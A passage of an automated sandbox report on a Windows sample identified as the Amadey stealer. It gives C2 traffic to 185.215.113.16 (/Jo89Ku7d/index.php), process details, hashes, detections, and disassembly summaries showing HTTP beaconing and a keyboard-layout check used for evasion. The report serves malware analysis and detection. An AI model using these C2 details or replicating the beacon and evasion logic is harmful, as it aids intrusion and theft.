                  Date: Wed, 25 Sep 2024 11:54:22 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  79 | 192.168.2.4 | 49816 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:54:22.192008972 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:54:22.887567997 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:22 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  80 | 192.168.2.4 | 49817 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:54:23.009463072 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:54:23.717819929 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:23 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session ID: 81 | Source IP: 192.168.2.4 | Source Port: 49818 | Destination IP: 185.215.113.16 | Destination Port: 80 | PID: 7556 | Process: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:54:23.726886988 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:54:24.452426910 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:24 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID: 82 | Source IP: 192.168.2.4 | Source Port: 49819 | Destination IP: 185.215.113.16 | Destination Port: 80 | PID: 7556 | Process: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:54:24.574521065 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:54:25.276405096 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:25 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session ID: 83 | Source IP: 192.168.2.4 | Source Port: 49820 | Destination IP: 185.215.113.16 | Destination Port: 80 | PID: 7556 | Process: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:54:25.285687923 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:54:26.000459909 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:25 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID: 84 | Source IP: 192.168.2.4 | Source Port: 49821 | Destination IP: 185.215.113.16 | Destination Port: 80 | PID: 7556 | Process: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:54:26.119631052 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:54:26.847058058 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:26 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Target ID:0
                  Start time:07:52:20
                  Start date:25/09/2024
                  Path:C:\Users\user\Desktop\file.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\file.exe"
                  Imagebase:0xd70000
                  File size:1'965'056 bytes
                  MD5 hash:48D34A4AC51F1A89E010B64FA8CFDCC2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000002.1829925792.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000003.1789238154.0000000004C80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:low
                  Has exited:true

                  Target ID:1
                  Start time:07:52:23
                  Start date:25/09/2024
                  Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                  Imagebase:0x730000
                  File size:1'965'056 bytes
                  MD5 hash:48D34A4AC51F1A89E010B64FA8CFDCC2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000001.00000003.1819093932.0000000004A00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000001.00000002.1859481096.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                  Antivirus matches:
                  • Detection: 100%, Avira
                  • Detection: 100%, Joe Sandbox ML
                  • Detection: 53%, ReversingLabs
                  Reputation:low
                  Has exited:true

                  Target ID:5
                  Start time:07:53:00
                  Start date:25/09/2024
                  Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Imagebase:0x730000
                  File size:1'965'056 bytes
                  MD5 hash:48D34A4AC51F1A89E010B64FA8CFDCC2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000005.00000003.2185572649.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:low
                  Has exited:false

                    Memory Dump Source
                    • Source File: 00000000.00000002.1831502789.0000000004EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4ea0000_file.jbxd

                    Execution Graph

                    Execution Coverage:6.9%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:5.8%
                    Total number of Nodes:516
                    Total number of Limit Nodes:31
                    execution_graph 13841 766974 13842 766982 13841->13842 13843 76698c 13841->13843 13844 7668bd 2 API calls 13843->13844 13845 7669a6 __freea 13844->13845 13676 73e410 13677 73e435 13676->13677 13679 73e419 13676->13679 13679->13677 13680 73e270 13679->13680 13681 73e280 __dosmaperr 13680->13681 13682 768979 2 API calls 13681->13682 13684 73e2bd std::_Xinvalid_argument 13682->13684 13683 73e435 13683->13679 13684->13683 13685 73e270 2 API calls 13684->13685 13685->13684 13836 7386b0 13837 7386b6 13836->13837 13838 7386d6 13837->13838 13839 7666e7 2 API calls 13837->13839 13840 7386d0 13839->13840 14015 73dfd0 recv 14016 73e032 recv 14015->14016 14017 73e067 recv 14016->14017 14019 73e0a1 14017->14019 14018 73e1c3 14019->14018 14020 74c5dc GetSystemTimePreciseAsFileTime 14019->14020 14021 73e1fe 14020->14021 14022 74c19a 7 API calls 14021->14022 14023 73e268 14022->14023 13400 741dd0 13401 741e6b shared_ptr __dosmaperr 13400->13401 13407 741e78 shared_ptr std::_Xinvalid_argument 13401->13407 13410 768979 13401->13410 13404 742265 shared_ptr 13404->13407 13414 7666e7 13404->13414 13405 74268b shared_ptr __dosmaperr 13406 768979 2 API calls 13405->13406 13405->13407 13408 742759 13406->13408 13408->13407 13418 735df0 13408->13418 13411 768994 13410->13411 13425 7686d7 13411->13425 13413 76899e 13413->13404 13415 7666f3 13414->13415 13417 7666fd __cftof __dosmaperr 13415->13417 13511 766670 13415->13511 13417->13405 13420 735e28 13418->13420 13419 735f0e shared_ptr 13419->13407 13420->13419 13421 736060 RegOpenKeyExA 13420->13421 13422 73645a shared_ptr 13421->13422 13424 7360b3 __cftof 13421->13424 13422->13407 13423 736153 RegEnumValueW 13423->13424 13424->13422 13424->13423 13426 7686e9 13425->13426 13430 7686fe __cftof __dosmaperr 13426->13430 13431 76683a 13426->13431 13429 76872e 13429->13430 13437 768925 13429->13437 13430->13413 13432 76685a 13431->13432 13436 766851 13431->13436 13432->13436 13443 76b4bb 13432->13443 13436->13429 13438 768962 
13437->13438 13439 768932 13437->13439 13504 76d2e9 13438->13504 13441 768941 __fassign 13439->13441 13499 76d30d 13439->13499 13441->13429 13444 76b4ce 13443->13444 13446 766890 13443->13446 13444->13446 13451 76f46b 13444->13451 13447 76b4e8 13446->13447 13448 76b4fb 13447->13448 13450 76b510 13447->13450 13448->13450 13482 76e571 13448->13482 13450->13436 13452 76f477 __cftof 13451->13452 13453 76f4c6 13452->13453 13456 768aaf 13452->13456 13453->13446 13455 76f4eb 13457 768ab4 __cftof 13456->13457 13461 768abf 13457->13461 13465 76d4f4 13457->13465 13460 768af2 __cftof __dosmaperr 13460->13455 13462 76651d 13461->13462 13470 7663f7 13462->13470 13466 76d500 __cftof 13465->13466 13467 76651d __cftof 2 API calls 13466->13467 13469 76d55c __cftof __dosmaperr 13466->13469 13468 76d6ee __cftof __dosmaperr 13467->13468 13468->13461 13469->13461 13471 766405 __cftof 13470->13471 13472 766450 13471->13472 13475 76645b 13471->13475 13472->13460 13480 76a1c2 GetPEB 13475->13480 13477 766465 13478 76646a GetPEB 13477->13478 13479 76647a __cftof 13477->13479 13478->13479 13481 76a1dc __cftof 13480->13481 13481->13477 13483 76e57b 13482->13483 13486 76e489 13483->13486 13485 76e581 13485->13450 13490 76e495 __cftof __freea 13486->13490 13487 76e4b6 13487->13485 13488 768aaf __cftof 2 API calls 13489 76e528 13488->13489 13491 76e564 13489->13491 13495 76a5ee 13489->13495 13490->13487 13490->13488 13491->13485 13496 76a611 13495->13496 13497 768aaf __cftof 2 API calls 13496->13497 13498 76a687 13497->13498 13500 76683a __cftof 2 API calls 13499->13500 13502 76d32a 13500->13502 13501 76d33a 13501->13441 13502->13501 13508 76f07f 13502->13508 13505 76d2f4 13504->13505 13506 76b4bb __cftof 2 API calls 13505->13506 13507 76d304 13506->13507 13507->13441 13509 76683a __cftof 2 API calls 13508->13509 13510 76f09f __cftof __fassign __freea 13509->13510 13510->13501 13512 766692 13511->13512 13514 76667d __cftof __dosmaperr __freea 13511->13514 13512->13514 13515 769ef9 13512->13515 
13514->13417 13516 769f36 13515->13516 13517 769f11 13515->13517 13516->13514 13517->13516 13519 7702f8 13517->13519 13520 770304 13519->13520 13522 77030c __cftof __dosmaperr 13520->13522 13523 7703ea 13520->13523 13522->13516 13524 77040c 13523->13524 13526 770410 __cftof __dosmaperr 13523->13526 13524->13526 13527 76fb7f 13524->13527 13526->13522 13528 76fbcc 13527->13528 13529 76683a __cftof 2 API calls 13528->13529 13530 76fbdb __cftof 13529->13530 13531 76fe7b 13530->13531 13532 76d2e9 2 API calls 13530->13532 13533 76c4ea GetPEB GetPEB __fassign 13530->13533 13531->13526 13532->13530 13533->13530 13939 749310 13940 749325 13939->13940 13941 749363 13939->13941 13942 74d041 SleepConditionVariableCS 13940->13942 13943 74932f 13942->13943 13943->13941 13944 74cff7 RtlWakeAllConditionVariable 13943->13944 13944->13941 13600 74b85e 13605 74b6e5 13600->13605 13602 74b886 13613 74b648 13602->13613 13604 74b89f 13606 74b6f1 Concurrency::details::_Reschedule_chore 13605->13606 13607 74b722 13606->13607 13623 74c5dc 13606->13623 13607->13602 13611 74b70c __Mtx_unlock 13612 732ad0 7 API calls 13611->13612 13612->13607 13614 74b654 Concurrency::details::_Reschedule_chore 13613->13614 13615 74b6ae 13614->13615 13616 74c5dc GetSystemTimePreciseAsFileTime 13614->13616 13615->13604 13617 74b669 13616->13617 13618 732ad0 7 API calls 13617->13618 13619 74b66f __Mtx_unlock 13618->13619 13620 732ad0 7 API calls 13619->13620 13621 74b68c __Cnd_broadcast 13620->13621 13621->13615 13622 732ad0 7 API calls 13621->13622 13622->13615 13631 74c382 13623->13631 13625 74b706 13626 732ad0 13625->13626 13627 732ada 13626->13627 13628 732adc 13626->13628 13627->13611 13648 74c19a 13628->13648 13632 74c3d8 13631->13632 13634 74c3aa 13631->13634 13632->13634 13637 74ce9b 13632->13637 13634->13625 13635 74c42d __Xtime_diff_to_millis2 13635->13634 13636 74ce9b _xtime_get GetSystemTimePreciseAsFileTime 13635->13636 13636->13635 13638 74ceaa 13637->13638 13640 74ceb7 __aulldvrm 13637->13640 

                    Control-flow Graph

                    APIs
                    • InternetOpenW.WININET(00788D70,00000000,00000000,00000000,00000000), ref: 0073BDED
                    • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0073BE11
                    • HttpOpenRequestA.WININET(?,00000000), ref: 0073BE5A
                    • HttpSendRequestA.WININET(?,00000000), ref: 0073BF1B
                    • InternetReadFile.WININET(?,?,000003FF,?), ref: 0073BFCD
                    • InternetCloseHandle.WININET(?), ref: 0073C0A7
                    • InternetCloseHandle.WININET(?), ref: 0073C0AF
                    • InternetCloseHandle.WININET(?), ref: 0073C0B7
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
                    • String ID: 8KG0fCKZFzY=$8KG0fymoFx==$RHYTYv==$RpKt$d4y$invalid stoi argument$stoi argument out of range
                    • API String ID: 688256393-2302553812
                    • Opcode ID: b3b79aea01e953e973c123072abaec5abf904d21c520d7713e8eaa2c4b0139f8
                    • Instruction ID: a9b6958b24a607182b91818d08e7a9fc7787982692fc088f54919ce0a2df2818
                    • Opcode Fuzzy Hash: b3b79aea01e953e973c123072abaec5abf904d21c520d7713e8eaa2c4b0139f8
                    • Instruction Fuzzy Hash: 03B1E5B1600118DBEF29DF28CC84B9EBB79EF45304F5041A9F509A7293D7799AC0CB95

                    Control-flow Graph

                    APIs
                    • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00736650
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    • Associated: 00000005.00000002.3014298798.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014325305.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014396359.0000000000799000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000932000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A47000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A51000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015307781.0000000000A60000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015461465.0000000000C0C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015490866.0000000000C0D000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015515557.0000000000C0E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015542488.0000000000C0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: AccountLookupName
                    • String ID: GVQsgL==$IVKsgL==$RBPleCSm
                    • API String ID: 1484870144-3856690409
                    • Opcode ID: 77612f40d51bcf77c3992f733a936de8807cc8b4b01afde5edf4c22381877e96
                    • Instruction ID: 2cb62d9e407c82ecf7cdb4c6eb848abe2d574d1a41f98555c1587609731ad10a
                    • Opcode Fuzzy Hash: 77612f40d51bcf77c3992f733a936de8807cc8b4b01afde5edf4c22381877e96
                    • Instruction Fuzzy Hash: 5691A5B19001189BDB28DB24CC89BDDB779EB49304F5085E9E50997283EB399FC4CFA4
                    APIs
                      • Part of subcall function 00747870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 0074795C
                      • Part of subcall function 00747870: __Cnd_destroy_in_situ.LIBCPMT ref: 00747968
                      • Part of subcall function 00747870: __Mtx_destroy_in_situ.LIBCPMT ref: 00747971
                      • Part of subcall function 0073BD60: InternetOpenW.WININET(00788D70,00000000,00000000,00000000,00000000), ref: 0073BDED
                      • Part of subcall function 0073BD60: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0073BE11
                      • Part of subcall function 0073BD60: HttpOpenRequestA.WININET(?,00000000), ref: 0073BE5A
                    • std::_Xinvalid_argument.LIBCPMT ref: 00744EA2
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    • Associated: 00000005.00000002.3014298798.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014325305.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014396359.0000000000799000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000932000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A47000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A51000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015307781.0000000000A60000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015461465.0000000000C0C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015490866.0000000000C0D000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015515557.0000000000C0E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015542488.0000000000C0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestXinvalid_argumentstd::_
                    • String ID: 5F6$ 6F9fr==$ JB6$ mP=$246122658369$8ZF6$9526$96B6$9KN6$Fz==$KFT0PL==$MJB+$MJF+$V0N6$V0x6$Vp 6$WJP6$aZT6$aqB6$fed3aa$stoi argument out of range$-y
                    • API String ID: 2414744145-1441314412
                    • Opcode ID: 518211ab260edaa9fdd49f1b7bfcceec7e09b22d4bc8d4e7f36ba44c008773e9
                    • Instruction ID: 91c74b336cdbb37bbcf48995f1808fcafc6a9414b230a2dbe585730ce06829c9
                    • Opcode Fuzzy Hash: 518211ab260edaa9fdd49f1b7bfcceec7e09b22d4bc8d4e7f36ba44c008773e9
                    • Instruction Fuzzy Hash: E4230671A00158DBEF19DB28CD8979DBB769B82304F5481D8E049AB2D3EB395F84CF52

                    Control-flow Graph

                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    • Associated: 00000005.00000002.3014298798.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014325305.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014396359.0000000000799000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000932000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A47000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A51000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015307781.0000000000A60000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015461465.0000000000C0C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015490866.0000000000C0D000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015515557.0000000000C0E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015542488.0000000000C0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                    • API String ID: 0-3963862150
                    • Opcode ID: bf64fe48f4a9c4ade0228abe305ff76cd52cfc8599a3e72b574532bb22d09bb9
                    • Instruction ID: 444cf58e86ea20b8e6e3a9dd1c4611bd77e29319527a5293c382b1b5b6f17a35
                    • Opcode Fuzzy Hash: bf64fe48f4a9c4ade0228abe305ff76cd52cfc8599a3e72b574532bb22d09bb9
                    • Instruction Fuzzy Hash: E1E16E71900218ABEB25DFA4CC8DBDEB779AB05304F5042D9E509A7292EB789FC4CF51

                    Control-flow Graph

                    APIs
                    • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00737EA3
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    • Associated: 00000005.00000002.3014298798.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014325305.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014396359.0000000000799000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000932000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A47000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A51000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015307781.0000000000A60000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015461465.0000000000C0C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015490866.0000000000C0D000.00000080.00000001.01000000.00000007.sdmpDownload File
